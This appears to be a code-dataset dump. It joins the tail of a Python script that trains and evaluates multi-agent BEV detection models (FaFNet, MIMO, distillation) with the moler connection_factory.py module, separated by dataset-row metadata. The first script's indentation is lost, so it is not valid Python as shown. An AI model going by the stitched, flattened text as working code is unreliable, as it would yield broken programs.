log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "a")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
saver.write("command line: {}\n".format(" ".join(sys.argv[1:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', split='train', config=config)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example = data_nuscenes[0]
trainset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='train', forcast_num = forcast_num)
print("Training dataset size:", len(trainset))
if args.mode == 'val':
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', config=config, split='val', val=True)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example, _, _ = data_nuscenes[0]
valset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='val', val=True)
valloader = torch.utils.data.DataLoader(valset, batch_size=1, shuffle=False, num_workers=1)
print("Validation dataset size:", len(valset))
if config.MGDA:
encoder = FeatEncoder()
encoder = nn.DataParallel(encoder)
encoder = encoder.to(device)
optimizer_encoder = optim.Adam(encoder.parameters(), lr=args.lr)
head = FaFMGDA(config)
head = nn.DataParallel(head)
head = head.to(device)
optimizer_head = optim.Adam(head.parameters(), lr=args.lr)
model = [encoder, head]
optimizer = [optimizer_encoder, optimizer_head]
elif config.MIMO:
if layer == 0:
model = FaFMIMONet_32_256_256(config)
elif layer == 1:
model = FaFMIMONet_64_128_128(config)
elif layer == 2:
if config.KD:
model = FaFMIMONet_128_64_64_KD(config)
else:
model = FaFMIMONet_128_64_64(config)
elif layer == 3:
if config.KD:
model = FaFMIMONet_256_32_32_KD(config)
else:
model = FaFMIMONet_256_32_32(config)
model = DDP(model, device_ids = args.rank)
else:
if config.KD:
model = FaFMIMONet_512_16_16_KD(config)
else:
model = FaFMIMONet_512_16_16(config)
model = nn.DataParallel(model)
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
else:
model = FaFNet(config)
model = nn.DataParallel(model)
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
criterion = {'cls': SoftmaxFocalClassificationLoss(), 'loc': WeightedSmoothL1LocalizationLoss()}
if config.KD:
teacher = FaFNet(config)
teacher = nn.DataParallel(teacher)
teacher = teacher.to(device)
fafmodule = FaFModuleKD(model, teacher, config, optimizer, criterion)
checkpoint_teacher = torch.load(args.resume_teacher)
start_epoch_teacher = checkpoint_teacher['epoch']
fafmodule.teacher.load_state_dict(checkpoint_teacher['model_state_dict'])
print("Load teacher model from {}, at epoch {}".format(args.resume_teacher, start_epoch_teacher))
else:
fafmodule = FaFModule(model, config, optimizer, criterion)
if args.resume != '' or args.mode == 'val':
checkpoint = torch.load(args.resume)
model_save_path = args.resume[:args.resume.rfind('/')]
start_epoch = checkpoint['epoch'] + 1
if only_load_model:
start_epoch = 0
if config.MGDA:
fafmodule.encoder.load_state_dict(checkpoint['encoder_state_dict'])
fafmodule.head.load_state_dict(checkpoint['head_state_dict'])
if not only_load_model:
fafmodule.scheduler_encoder.load_state_dict(checkpoint['scheduler_encoder_state_dict'])
fafmodule.optimizer_encoder.load_state_dict(checkpoint['optimizer_encoder_state_dict'])
fafmodule.scheduler_head.load_state_dict(checkpoint['scheduler_head_state_dict'])
fafmodule.optimizer_head.load_state_dict(checkpoint['optimizer_head_state_dict'])
else:
fafmodule.model.load_state_dict(checkpoint['model_state_dict'])
if not only_load_model:
fafmodule.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
fafmodule.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
print("Load model from {}, at epoch {}".format(args.resume, start_epoch - 1))
if args.mode == 'train':
n_train = len(trainset)
indices = list(range(n_train))
data_cache = {}
for epoch in range(start_epoch, num_epochs + 1):
latency_num = (epoch - 100) / 10
latency_lambda = [latency_num, latency_num, latency_num, latency_num, latency_num]
print('latency of this epoch is', latency_lambda)
if config.MGDA:
lr = fafmodule.optimizer_head.param_groups[0]['lr']
else:
lr = fafmodule.optimizer.param_groups[0]['lr']
print("Epoch {}, learning rate {}".format(epoch, lr))
if need_log:
saver.write("epoch: {}, lr: {}\t".format(epoch, lr))
saver.flush()
running_loss_disp = AverageMeter('Total loss', ':.6f')
running_loss_class = AverageMeter('classification Loss', ':.6f')
running_loss_loc = AverageMeter('Localization Loss', ':.6f')
if config.MGDA:
fafmodule.scheduler_encoder.step()
fafmodule.encoder.train()
fafmodule.scheduler_head.step()
fafmodule.head.train()
else:
fafmodule.scheduler.step()
fafmodule.model.train()
step_ct = 1
t = time.time()
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
trainloader = torch.utils.data.DataLoader(trainset, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
time_10 = time.time()
for sample in tqdm(trainloader):
time_t0 = time.time()
print("返回时间", time_t0 - trainset.time_4)
padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0, filename0 = sample[0]['padded_voxel_points'] ,sample[0]['padded_voxel_points_teacher'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'] ,sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'], sample[0]['filename']
padded_voxel_points1, padded_voxel_points_teacher1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, target_agent_id1, num_sensor1, trans_matrices1, filename1 = sample[1]['padded_voxel_points'] ,sample[1]['padded_voxel_points_teacher'] ,sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'] ,sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'], sample[1]['filename']
padded_voxel_points2, padded_voxel_points_teacher2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, target_agent_id2, num_sensor2, trans_matrices2, filename2 = sample[2]['padded_voxel_points'] ,sample[2]['padded_voxel_points_teacher'] ,sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'] ,sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'], sample[2]['filename']
padded_voxel_points3, padded_voxel_points_teacher3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, target_agent_id3, num_sensor3, trans_matrices3, filename3 = sample[3]['padded_voxel_points'] ,sample[3]['padded_voxel_points_teacher'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'] ,sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'], sample[3]['filename']
padded_voxel_points4, padded_voxel_points_teacher4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, target_agent_id4, num_sensor4, trans_matrices4, filename4 = sample[4]['padded_voxel_points'] ,sample[4]['padded_voxel_points_teacher'] ,sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'] ,sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'], sample[4]['filename']
center_agent = sample['center_agent']
time_t1 = time.time()
print("计时点1", time_t1 - time_t0)
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2, padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
time_t2 = time.time()
print("计时点2", time_t2 - time_t1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
time_t3 = time.time()
print("计时点3", time_t3 - time_t2)
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3, target_agent_id4]
num_agent_list = [num_sensor0[-1], num_sensor1[-1], num_sensor2[-1], num_sensor3[-1], num_sensor4[-1]]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1)
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
time_t4 = time.time()
print("计时点4", time_t4 - time_t3)
data = {}
data['file_name'] = [filename0, filename1, filename2, filename3, filename4]
data['bev_seq'] = padded_voxel_points.to(device)
time_t5_0 = time.time()
print("计时点5_0", time_t5_0 - time_t4)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['vis_maps'] = vis_maps.to(device)
time_t5_1 = time.time()
print("计时点5_1", time_t5_1 - time_t5_0)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
time_8 = time.time()
time_c = time_8- time_10
time_t5 = time.time()
print("计时点5", time_t5 - time_t4)
print("数据读取时间", time_c)
print("从loader到网络", time_8-trainset.time_4)
time_9 = time.time()
if config.KD:
padded_voxel_points_list_teacher = [padded_voxel_points_teacher0, padded_voxel_points_teacher1, padded_voxel_points_teacher2, padded_voxel_points_teacher3, padded_voxel_points_teacher4]
padded_voxel_points_teacher = torch.cat(tuple(padded_voxel_points_list_teacher), 0)
data['bev_seq_teacher'] = padded_voxel_points_teacher.to(device)
data['kd_weight'] = args.kd
data['layer'] = layer
if config.KD:
loss, cls_loss, loc_loss,kd_loss = fafmodule.step(data, batch_size, center_agent)
else:
loss, cls_loss, loc_loss = fafmodule.step(data, batch_size, center_agent, forcast_num)
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
time_10 = time.time()
print("total_time:", time_10 - time_9)
step_ct += 1
print("\nEpoch {}, Step {}".format(epoch, step_ct))
print("Running total loss: {}".format(running_loss_disp.avg))
print("Running total cls loss: {}".format(running_loss_class.avg))
print("Running total loc loss: {}".format(running_loss_loc.avg))
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
if need_log:
if config.KD:
saver.write("{}\t{}\t{}\tkd loss:{} Take {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,kd_loss,str(time.time()-t)))
else:
saver.write("{}\t{}\t{}\tTake {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,str(time.time()-t)))
saver.flush()
if config.MGDA:
save_dict = {'epoch': epoch,
'encoder_state_dict': fafmodule.encoder.state_dict(),
'optimizer_encoder_state_dict': fafmodule.optimizer_encoder.state_dict(),
'scheduler_encoder_state_dict': fafmodule.scheduler_encoder.state_dict(),
'head_state_dict': fafmodule.head.state_dict(),
'optimizer_head_state_dict': fafmodule.optimizer_head.state_dict(),
'scheduler_head_state_dict': fafmodule.scheduler_head.state_dict(),
'loss': running_loss_disp.avg}
else:
save_dict = {'epoch': epoch,
'model_state_dict': fafmodule.model.state_dict(),
'optimizer_state_dict': fafmodule.optimizer.state_dict(),
'scheduler_state_dict': fafmodule.scheduler.state_dict(),
'loss': running_loss_disp.avg}
torch.save(save_dict, os.path.join(model_save_path, 'epoch_' + str(epoch) + '.pth'))
elif args.mode == 'val':
if config.MGDA:
fafmodule.encoder.eval()
fafmodule.head.eval()
else:
fafmodule.model.eval()
running_loss_disp = AverageMeter('Total loss', ':.6f')
running_loss_class = AverageMeter('classification Loss', ':.6f')
running_loss_loc = AverageMeter('Localization Loss', ':.6f')
det_results_local = [[] for i in range(5)]
annotations_local = [[] for i in range(5)]
for sample in valloader:
t = time.time()
center_agent = sample['center_agent']
padded_voxel_points0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, gt_max_iou0, filename0, \
target_agent_id0, num_sensor0, trans_matrices0, padded_voxel_points_global, reg_target_global, anchors_map_global, gt_max_iou_global, trans_matrices_map = sample[0]['padded_voxel_points'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'], sample[0]['gt_max_iou'], sample[0]['filename'], sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'],sample[0]['padded_voxel_points_global'],sample[0]['reg_target_global'],sample[0]['anchors_map_global'],sample[0]['gt_max_iou_global'],sample[0]['trans_matrices_map']
padded_voxel_points1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, gt_max_iou1, filename1, target_agent_id1, num_sensor1, trans_matrices1, _, _, _, _, _ = sample[1]['padded_voxel_points'], sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'], sample[1]['gt_max_iou'], sample[1]['filename'], sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'],sample[1]['padded_voxel_points_global'],sample[1]['reg_target_global'],sample[1]['anchors_map_global'],sample[1]['gt_max_iou_global'],sample[1]['trans_matrices_map']
padded_voxel_points2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, gt_max_iou2, filename2, target_agent_id2, num_sensor2, trans_matrices2, _, _, _, _, _ = sample[2]['padded_voxel_points'], sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'], sample[2]['gt_max_iou'], sample[2]['filename'], sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'],sample[2]['padded_voxel_points_global'],sample[2]['reg_target_global'],sample[2]['anchors_map_global'],sample[2]['gt_max_iou_global'],sample[2]['trans_matrices_map']
padded_voxel_points3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, gt_max_iou3, filename3, target_agent_id3, num_sensor3, trans_matrices3, _, _, _, _, _ = sample[3]['padded_voxel_points'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'], sample[3]['gt_max_iou'], sample[3]['filename'], sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'],sample[3]['padded_voxel_points_global'],sample[3]['reg_target_global'],sample[3]['anchors_map_global'],sample[3]['gt_max_iou_global'],sample[3]['trans_matrices_map']
padded_voxel_points4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, gt_max_iou4, filename4, target_agent_id4, num_sensor4, trans_matrices4, _, _, _, _, _ = sample[4]['padded_voxel_points'],sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'], sample[4]['gt_max_iou'], sample[4]['filename'], sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'],sample[4]['padded_voxel_points_global'],sample[4]['reg_target_global'],sample[4]['anchors_map_global'],sample[4]['gt_max_iou_global'],sample[4]['trans_matrices_map']
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2,
padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
gt_max_iou = [gt_max_iou0, gt_max_iou1, gt_max_iou2, gt_max_iou3, gt_max_iou4]
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3,
target_agent_id4]
num_agent_list = [num_sensor0, num_sensor1, num_sensor2, num_sensor3, num_sensor4]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1)
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
data = {}
data['bev_seq'] = padded_voxel_points.to(device)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['vis_maps'] = vis_maps.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
loss, cls_loss, loc_loss, result = fafmodule.predict_all(data, 1, True, center_agent)
for k in range(num_sensor0):
data_agents = {}
data_agents['bev_seq'] = torch.unsqueeze(padded_voxel_points[k, :, :, :, :], 1)
data_agents['reg_targets'] = torch.unsqueeze(reg_target[k, :, :, :, :, :], 0)
data_agents['anchors'] = torch.unsqueeze(anchors_map[k, :, :, :, :], 0)
temp = gt_max_iou[k]
data_agents['gt_max_iou'] = temp[0]['gt_box'][0, :, :]
result_temp = result[k]
temp = {'bev_seq': data_agents['bev_seq'][0, -1].cpu().numpy(), 'result': result_temp[0][0],
'reg_targets': data_agents['reg_targets'].cpu().numpy()[0],
'anchors_map': data_agents['anchors'].cpu().numpy()[0],
'gt_max_iou': data_agents['gt_max_iou']}
det_results_local[k], annotations_local[k] = cal_local_mAP(config, temp, det_results_local[k],
annotations_local[k])
filename = str(filename0[0][0])
cut = filename[filename.rfind('agent') + 7:]
seq_name = cut[:cut.rfind('_')]
idx = cut[cut.rfind('_') + 1:cut.rfind('/')]
idx_save = str(idx) + '.png'
print("Validation scene {}, at frame {}".format(seq_name, idx))
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
print("Quantitative evaluation results of model from {}, at epoch {}".format(args.resume, start_epoch - 1))
log_results_file = args.logname + '.txt'
saver_val = open(log_results_file,'w')
det_results_all_local = det_results_local[0] + det_results_local[1] + det_results_local[2] + det_results_local[3]
annotations_all_local = annotations_local[0] + annotations_local[1] + annotations_local[2] + annotations_local[3]
saver_val.write('\noverall local results@iou0.5\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
saver_val.write('\noverall local results@iou0.7\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
for k in range(4):
saver_val.write('\nlocal{} results@iou0.5\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
saver_val.write('\nlocal{} results@iou0.7\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
else:
print('Not implemented yet.')
if need_log:
saver.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default=None, type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--resume', default='', type=str, help='The path to the saved model that is loaded to resume training')
parser.add_argument('--resume_teacher', default='/DATA_SSD/slren/teacher_aug_batch_4_epoch_100.pth', type=str, help='The path to the saved teacher model that is loaded to resume training')
parser.add_argument('--kd', default=100000, type=float, help='kd_weight')
parser.add_argument('--model_only', action='store_true', help='only load model')
parser.add_argument('--batch', default=2, type=int, help='Batch size')
parser.add_argument('--nepoch', default=100, type=int, help='Number of epochs')
parser.add_argument('--layer', default=3, type=int, help='Communicate which layer')
parser.add_argument('--nworker', default=0, type=int, help='Number of workers')
parser.add_argument('--lr', default=0.001, type=float, help='Initial learning rate')
parser.add_argument('--log', action='store_true', help='Whether to log')
parser.add_argument('--logpath', default='./log', help='The path to the output log file')
parser.add_argument('--mode', default=None, help='Train/Val mode')
parser.add_argument('--visualization', default=True, help='Visualize validation result')
parser.add_argument('--binary', default=True, type=bool, help='Only detect car')
parser.add_argument('--only_det', default=True, type=bool, help='Only do detection')
parser.add_argument('--logname', default=None, type=str, help='log the detection performance')
parser.add_argument('--forcast_num', default=4, type=int, help='How many frames do you want to use in forcast')
parser.add_argument('--rank', default=0, type=int, help='node rank for distributed training')
parser.add_argument('--ngpus_per_node', default=2, type=int)
parser.add_argument('--gpu', default=2, type=int, help='GPU id to use.')
torch.multiprocessing.set_sharing_strategy('file_system')
args = parser.parse_args()
print(args)
config = Config('train', binary=args.binary, only_det=args.only_det)
config_global = ConfigGlobal('train', binary=args.binary, only_det=args.only_det)
main(config, config_global, args)
| true
| true
|
1c3ea3db82bc9ca8412c76aa081720e97c4c8d00
| 8,617
|
py
|
Python
|
moler/connection_factory.py
|
AdamKlekowski/moler
|
9d032bad402d9863685b2a8624320566512c14cc
|
[
"BSD-3-Clause"
] | 2
|
2021-03-14T15:17:10.000Z
|
2021-03-15T07:12:12.000Z
|
moler/connection_factory.py
|
Laymer/moler
|
2d7b89efdc2ca5e9975112b97934b396e24b5505
|
[
"BSD-3-Clause"
] | null | null | null |
moler/connection_factory.py
|
Laymer/moler
|
2d7b89efdc2ca5e9975112b97934b396e24b5505
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
One of Moler's goals is to be IO-agnostic.
So it can be used under twisted, asyncio, curio any any other IO system.
Moler's connection is very thin layer binding Moler's ConnectionObserver with external IO system.
Connection responsibilities:
- have a means for sending outgoing data via external IO
- have a means for receiving incoming data from external IO
- perform data encoding/decoding to let external IO use pure bytes
- have a means allowing multiple observers to get it's received data (data dispatching)
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import logging
import platform
import moler.config.connections as connection_cfg
from moler.threaded_moler_connection import ThreadedMolerConnection
def get_connection(name=None, io_type=None, variant=None, **constructor_kwargs):
"""
Return connection instance of given io_type/variant
:param name: name of connection defined in configuration
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor_kwargs: arguments specific for given io_type
:return: requested connection
You may provide either 'name' or 'io_type' but not both.
If you provide 'name' then it is searched inside configuration
to find io_type and constructor_kwargs assigned to that name.
If variant is not given then it is taken from configuration.
"""
if (not name) and (not io_type):
err_msg = "Provide either 'name' or 'io_type' parameter (none given)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
if name and io_type:
err_msg = "Use either 'name' or 'io_type' parameter (not both)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
io_type, constructor_kwargs = _try_take_named_connection_params(name, io_type, **constructor_kwargs)
variant = _try_select_io_type_variant(io_type, variant)
io_conn = _try_get_connection_with_name(io_type, variant, **constructor_kwargs)
return io_conn
class ConnectionFactory(object):
"""
ConnectionFactory creates plugin-system: external code can register
"construction recipe" that will be used to create specific connection.
"Construction recipe" means: class to be used or any other callable that can
produce instance of connection.
Specific means type/variant pair.
Type is: memory, tcp, udp, ssh, ...
Variant is: threaded, asyncio, twisted, ...
Connection means here: external-IO-connection + moler-connection.
Another words - fully operable connection doing IO and data dispatching,
ready to be used by ConnectionObserver.
ConnectionFactory responsibilities:
- register "recipe" how to build given type/variant of connection
- return connection instance created via utilizing registered "recipe"
"""
_constructors_registry = {}
@classmethod
def register_construction(cls, io_type, variant, constructor):
"""
Register constructor that will return "connection construction recipe"
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor: callable building connection object
:return: None
"""
if not callable(constructor):
err_msg = "constructor must be callable not {}".format(constructor)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise ValueError(err_msg)
cls._constructors_registry[(io_type, variant)] = constructor
@classmethod
def get_connection(cls, io_type, variant, **constructor_kwargs):
"""
Return connection instance of given io_type/variant
:param io_type: 'tcp', 'memory', 'ssh', ...
:param variant: implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
:param constructor_kwargs: arguments specific for given io_type
:return: requested connection
"""
key = (io_type, variant)
if key not in cls._constructors_registry:
err_msg = "No constructor registered for [{}] connection".format(key)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
constructor = cls._constructors_registry[key]
connection = constructor(**constructor_kwargs)
# TODO: enhance error reporting:
# not giving port for tcp connection results in not helpful:
# TypeError: tcp_thd_conn() takes at least 1 argument (1 given)
# try to use funcsigs.signature to give more detailed missing-param
return connection
@classmethod
def available_variants(cls, io_type):
"""
Return variants available for given io_type
:param io_type: 'tcp', 'memory', 'ssh', ...
:return: list of variants, ex. ['threaded', 'twisted']
"""
available = [vt for io, vt in cls._constructors_registry if io == io_type]
return available
def _moler_logger_log(level, msg):
logger = logging.getLogger('moler')
logger.log(level, msg)
def _try_take_named_connection_params(name, io_type, **constructor_kwargs):
if name:
if name not in connection_cfg.named_connections:
whats_wrong = "was not defined inside configuration"
err_msg = "Connection named '{}' {}".format(name, whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
org_kwargs = constructor_kwargs
io_type, constructor_kwargs = connection_cfg.named_connections[name]
# assume connection constructor allows 'name' parameter
constructor_kwargs['name'] = name
# update with kwargs directly passed and not present in named_connections
for argname in org_kwargs:
if argname not in constructor_kwargs:
constructor_kwargs[argname] = org_kwargs[argname]
# TODO: shell we overwrite named_connections kwargs with the ones from org_kwargs ???
return io_type, constructor_kwargs
def _try_select_io_type_variant(io_type, variant):
if (io_type == 'terminal') and (platform.system() == 'Windows'): # TODO: fix if we will have win implementation of terminal
whats_wrong = "No '{}' connection available on Windows".format(io_type)
fix = "try using 'sshshell' connection instead"
err_msg = "{} ({})".format(whats_wrong, fix)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AttributeError(err_msg)
if variant is None:
if io_type in connection_cfg.default_variant:
variant = connection_cfg.default_variant[io_type]
if variant is None:
whats_wrong = "No variant selected"
selection_method = "directly or via configuration"
err_msg = "{} ({}) for '{}' connection".format(whats_wrong,
selection_method,
io_type)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
if variant not in ConnectionFactory.available_variants(io_type):
whats_wrong = "is not registered inside ConnectionFactory"
err_msg = "'{}' variant of '{}' connection {}".format(variant,
io_type,
whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
return variant
def _try_get_connection_with_name(io_type, variant, **constructor_kwargs):
try:
return ConnectionFactory.get_connection(io_type, variant, **constructor_kwargs)
except TypeError as err:
if "unexpected keyword argument 'name'" in str(err):
# 'name' parameter not allowed in connection constructor
del constructor_kwargs['name']
return ConnectionFactory.get_connection(io_type, variant,
**constructor_kwargs)
_moler_logger_log(level=logging.DEBUG, msg=repr(err))
raise
# actions during import
connection_cfg.register_builtin_connections(ConnectionFactory, ThreadedMolerConnection)
connection_cfg.set_defaults()
| 43.520202
| 128
| 0.678542
|
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import logging
import platform
